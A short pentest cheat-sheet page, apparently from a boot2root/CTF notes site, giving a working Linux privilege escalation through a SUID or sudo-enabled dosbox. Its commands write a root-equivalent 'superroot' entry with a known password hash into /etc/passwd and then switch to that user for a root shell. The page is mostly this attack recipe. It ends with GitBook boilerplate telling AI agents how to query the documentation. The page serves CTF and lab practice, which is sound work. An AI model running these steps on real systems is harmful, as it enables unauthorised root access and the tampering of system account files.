> For the complete documentation index, see [llms.txt](https://h3ll-ka1ser.gitbook.io/boot2root/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://h3ll-ka1ser.gitbook.io/boot2root/privilege-escalation/linux/dosbox-privilege-escalation.md).

# Dosbox Privilege Escalation

## Resources:

<https://gtfobins.github.io/gtfobins/dosbox/>

## Requirements:

dosbox has SUID bit, or user can run as sudo

Recommended to use with X11 GUI if possible

### 1) Connect via SSH using X11

```
ssh -X user@TARGET_IP
```

### 2) Create our superroot user to overwrite the /etc/passwd file

```
echo 'superroot:sXuCKi7k3Xh/s:0:0::/root:/bin/bash' > fkpasswd
```

### 3) Run dosbox

```
dosbox
```

### 4) In dosbox GUI, Overwrite /etc/passwd file

```
mount d /
D:
type D:\HOME\USER\FKPASSWD >> D:\ETC\PASSWD
```

### 5) Get root

```
su - superroot
toor
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://h3ll-ka1ser.gitbook.io/boot2root/privilege-escalation/linux/dosbox-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
